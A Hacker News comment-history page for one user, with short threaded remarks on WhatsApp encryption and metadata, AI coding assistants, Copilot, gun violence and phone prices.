Hacker Newsnew | past | comments | ask | show | jobs | submit | wordofx's commentslogin

You don’t need to take guns away to solve gun violence. He’s 100% right. Start dealing with crime. Stop allowing criminals into the country. Stop releasing criminals back onto the streets. Stop ignoring people with violent tendencies.


Awww you upset you can’t afford it?


You're an idiot if you think owning a $1k phone is a status symbol.


Oh now it’s about a status symbol. So you can’t afford a status symbol and you’re upset? :(


So much for that e2e encryption that HN claimed was so good and that META couldn’t possibly use what’s app messages to do advertising from.


Messages are e2e and WA doesn't have access to them. We're talking about the metadata here.

From the article: > including contact information, IP addresses and profile photos

I can confirm this, I used to work at WhatsApp.


> Messages are e2e and WA doesn't have access to them. We're talking about the metadata here.

You're still just blindly trusting this is the case. You can't verify the encryption or any of the code.

It would be trivial to actually encrypt the message and send it out and then store an unecrypted version locally and quietly exfiltrate it later.

They have to already be storing an unecrypted version locally, because you can see the messages. So unless your analyzing packets on the scale of months or years, you cannot possibly know that it isn't being exfiltrate at some point.

Take it a step further: put the extiltration behind a flag, and then when the NSA asks, turn on the flag for that person. Security researchers will never find it.


We don't really know that messages really are end-to-end encrypted though, do we? Is there a way to actually check that the messages in transit are encrypted in a way that only the other end can decrypt them? If not, we have to take Meta's word for it, which frankly doesn't carry much weight.


Not trivially. But with painstaking reverse engineering you could prove this. And people have, so you're not exclusively just taking Meta's word. The fact that Pegasus malware relied on remote code execution vuln to run malware on your phone to extract WhatsApp messages, really suggests that the E2EE works. If it wasn't E2EE, then the makers of Pegasus could have just intercepted traffic to get your messages.

Academics have also reverse engineered it as well, and though there are some weakness it's not a lie that WhatsApp is E2EE. Here's some I just found:

- https://eprint.iacr.org/2025/794.pdf

- https://i.blackhat.com/USA-19/Wednesday/us-19-Zaikin-Reverse...


This does not prove that Meta does not have the ability to decrypt the messages.


Eh, well painstaking reverse engineering is like having the source code, just 10000x more work. With that I feel like it should be possible to ensure this, or at least with some high level of confidence.


How can we call it "E2E encryption" in any meaningful sense of the term when the ends run proprietary code, and at least one of the ends has proven themselves unworthy of trust time and again.


Meta/WA. Same thing. Might have worked at WhatsApp but FB still advertises based on conversation content.


Not sure this is correct - alaq said the messages are e2e, so not visible at all by anyone other that the participants of the conversation. The meta->data<- however IS visible by them and can and is likely to be used for advertising.


Of course the meta data is visible. Its probably more useful than the actual content of the conversation too. I mean from an ML perspective how would you even make features out of conversation that help with CTR ? That too without creeping the users out. I'd imagine its the same reason why meta doesnt (likely) listen in on mobile mics. Why go through the whole shebang of running always on transcription when simple features like who talked to who and at what times are more useful at establishing user similarities.


I'm not making a stance on things, just clarifying the previous comment


HN isn’t monolith, I personally never said WhatsApp is good, and I’m telling you from now avoid Signal too till they remove the phone number requirement AND you can deploy your own server.


I disagree with their CoC on AI. There are so many projects which are important and don’t let you contribute or make the barrier to entry so hard, and so you do best effort to raise a detailed bug description for it to sit there for 14 years or them to tell you to get fucked. So anyone who complains about AI isn’t worth the time and day and I support not getting paid as much if at all.


> Most users will just give a vague tasks like: "write a clone of Steam" or "create a rocket" and then they blame Claude Code.

This seems like half of HN with how much HN hates AI. Those who hate it or say it’s not useful to them seem to be fighting against it and not wanting to learn how to use it. I still haven’t seen good examples of it not working even with obscure languages or proprietary stuff.


Anyone who has mentored as part of a junior engineer internship program AND has attempted to use current gen ai tooling will notice the parallels immediately. There are key differences though that are worth highlighting.

The main difference is that with the current batch of genai tools, the AI's context resets after use, whereas a (good) intern truly learns from prior behavior.

Additionally, as you point out, the language and frameworks need to be part of the training set since AI isn't really "learning" it's just prepolulating a context window for its pre-existing knowledge (token prediction), so ymmv depending on hidden variables from the secret (to you, the consumers) training data and weights. I use Ruby primarily these days, which is solidly in the "boring tech" camp and most AIs fail to produce useful output that isn't rails boilerplate.

If I did all my IC contributions via directed intern commits I'd leave the industry out of frustration. Using only AI outputs for producing code changes would be akin to torture (personally.)

Edit: To clarify I'm not against AI use, I'm just stating that with the current generation of tools it is a pretty lackluster experience when it comes to net new code generation. It excells at one off throwaway scripts and making large tedious redactors less drudgerly. I wouldn't pivot to it being my primary method of code generation until some of the more blatant productiviy losses are addressed.


When it's best suggestion (for inline typing) is bring back a one-off experiment in a different git worktree from 3 months ago that I only needed that one time.. it does make me wonder.

Now, it's not always useless. It's GREAT at adding debugging output and knowing which variables I just added and thus want to add to the debugging output. And that does save me time.

And it does surprise me sometimes with how well it picks up on my thinking and makes a good suggestion.

But I can honestly only accept maybe 15-20% of the suggestions it makes - the rest are often totally different from what I'm working on / trying to do.

And it's C++. But we have a very custom library to do user-space context switching, and everything is built on that.


> not wanting to learn how to use it

I kind of feel this. I’ll code for days and forget to eat or shower. I love it. Using Claude code is oddly unsatisfying to me. Probably a different skillset, one that doesn’t hit my obsessive tendencies for whatever reason.

I could see being obsessed with some future flavor of it, and I think it would be some change with the interface, something more visual (gamified?). Not low-code per se, but some kind of mashup of current functionality with graph database visualization (not just node force graphs, something more functional but more ergonomic). I haven’t seen anything that does this well, yet.


If you have to iterate 10 times, that is "not working", since it already wasted way more time than doing it manually to begin with.


> because my corporate code base is a mess that doesn’t lend itself well to AI

What language? I picked up an old JS project that had several developers fail over weeks to upgrade to newer versions of react. But I got it done in a day by using AI to generate a ton of unit tests then loop an upgrade / test / build. Was 9 years out of date and it’s running in prod now with less errors than before.

Also upgraded rails 4 app to rails 8 over a few days.

Done other apps too. None of these are small. Found a few memory leaks in a C++ app that our senior “experts” who have spent 20 years doing c++ couldn’t find.


Almost no one uses copilot unless they are not allowed to use anything else or don’t know any better. MS could have been a leader in this space but MS couldn’t understand why people didn’t like copilot but loved the competition.


Once co-pilot tendrils and icons began appearing in all of my orgs tools, they announced we would no longer be able to expense subscriptions for others. Only those who haven’t used ChatGPT Pro, Claude, Gemini, etc have anything good to say about copilot.


Unfortunately we are stuck with trash tailwind.


Just another brick in bloated web.


Things are only created or expanded if there is a return. Its that simple.


I’m wondering at what point the minority are going to finally accept ai is here to stay.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: